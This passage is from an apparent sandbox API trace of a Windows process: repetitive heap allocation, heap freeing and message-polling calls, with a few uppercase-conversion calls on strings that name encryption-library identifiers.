Size=0x8) returned 0x2e54cd8 [0221.542] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xca26) returned 0x2f31250 [0221.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0221.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.543] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0221.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0221.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0221.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0221.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0221.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xca26) returned 0x2f24820 [0221.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0221.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f24820 | out: hHeap=0x970000) returned 1 [0221.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0221.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e60 | out: hHeap=0x970000) returned 1 [0221.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.543] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.543] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.543] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c08 [0221.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0221.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b28 [0221.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b28 | out: hHeap=0x970000) returned 1 [0221.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0221.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0221.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77788 [0221.544] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0221.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0221.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04540 [0221.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c08 [0221.544] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0221.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04540 | out: hHeap=0x970000) returned 1 [0221.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c08 | out: hHeap=0x970000) returned 1 [0221.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d58 [0221.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c08 [0221.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0221.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e30 [0221.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54db8 [0221.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0221.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xca26) returned 0x2f24820 [0221.544] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0221.544] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e60 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55038 [0221.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54f88 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f08 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0221.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54fc8 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d88 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55098 [0221.545] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55098 | out: hHeap=0x970000) returned 1 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50fb0 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f418 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50db8 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f78 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55008 [0221.545] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xca26) returned 0x2f3dc80 [0221.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6c0 [0221.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0221.546] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550f8 [0221.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50e90 | out: hHeap=0x970000) returned 1 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f670 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f508 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e78 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fe8 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f800 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ef0 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f58 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f20 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78618 [0221.547] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ce0 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f68 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f530 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cf8 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550d8 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51148 [0221.547] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511d8 [0221.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0221.547] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550c8 | out: hHeap=0x970000) returned 1 [0221.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0221.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0221.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0221.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0221.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51190 [0221.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fa8 [0221.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f580 [0221.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51178 [0221.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550c8 [0221.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50fc8 [0221.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51250 [0221.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0221.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.548] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0221.548] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0221.548] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510a0 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55108 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f3a0 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51040 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f28 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51220 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51160 [0221.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0221.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0221.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50cc8 | out: hHeap=0x970000) returned 1 [0221.549] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0221.549] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cc8 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55098 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f6e8 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0221.549] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f18 [0221.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51238 | out: hHeap=0x970000) returned 1 [0221.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f7d8 [0221.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51058 [0221.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51208 [0221.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f5a8 | out: hHeap=0x970000) returned 1 [0221.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0221.550] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f80 [0221.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55048 [0221.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51070 [0221.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51238 [0221.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e550e8 [0221.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f5a8 [0221.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511f0 [0221.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f38 [0221.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e511a8 [0221.550] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51268 [0221.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50f80 | out: hHeap=0x970000) returned 1 [0221.550] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55048 | out: hHeap=0x970000) returned 1 [0221.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51070 | out: hHeap=0x970000) returned 1 [0221.551] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e7f710 [0221.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0221.551] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0221.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7f710 | out: hHeap=0x970000) returned 1 [0221.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0221.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e510d0 [0221.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0221.551] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0221.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f041c0 [0221.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f98 [0221.551] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0221.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f041c0 | out: hHeap=0x970000) returned 1 [0221.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0221.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0221.551] PeekMessageW (in: lpMsg=0x8ced58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ced58) returned 0 [0221.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55028 [0221.551] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.551] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0221.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b70 | out: hHeap=0x970000) returned 1 [0221.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0221.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69988 [0221.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0221.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f48 | out: hHeap=0x970000) returned 1 [0221.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e775c8 [0221.552] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e775c8 | out: hHeap=0x970000) returned 1 [0221.552] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04460 [0221.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55088 [0221.552] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0221.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04460 | out: hHeap=0x970000) returned 1 [0221.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0221.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e51280 [0221.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0221.552] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.552] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.552] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0221.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0221.553] PeekMessageW (in: lpMsg=0x8ceef8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8ceef8) returned 0 [0221.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0221.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51280 | out: hHeap=0x970000) returned 1 [0221.553] PeekMessageW (in: lpMsg=0x8cf158, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf158) returned 0 [0221.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fd8 [0221.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0221.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0221.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e510d0 | out: hHeap=0x970000) returned 1 [0221.553] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77b48 [0221.553] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0221.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69be8 [0221.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69be8 | out: hHeap=0x970000) returned 1 [0221.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0221.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77588 [0221.553] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.553] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77588 | out: hHeap=0x970000) returned 1 [0221.553] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0221.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f48 [0221.553] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51130 [0221.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51280 [0221.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55068 [0221.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2f04498 [0221.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e55018 [0221.554] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0221.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f04498 | out: hHeap=0x970000) returned 1 [0221.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0221.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e511c0 [0221.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b28 [0221.554] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0221.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0221.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fb8 | out: hHeap=0x970000) returned 1 [0221.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78b28 | out: hHeap=0x970000) returned 1 [0221.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e511c0 | out: hHeap=0x970000) returned 1 [0221.554] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0221.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51118 [0221.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55018 [0221.554] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e510e8 [0221.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55018 | out: hHeap=0x970000) returned 1 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51100 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f98 [0221.555] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51298 [0221.555] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f98 | out: hHeap=0x970000) returned 1 [0221.555] RtlAllocateHeap 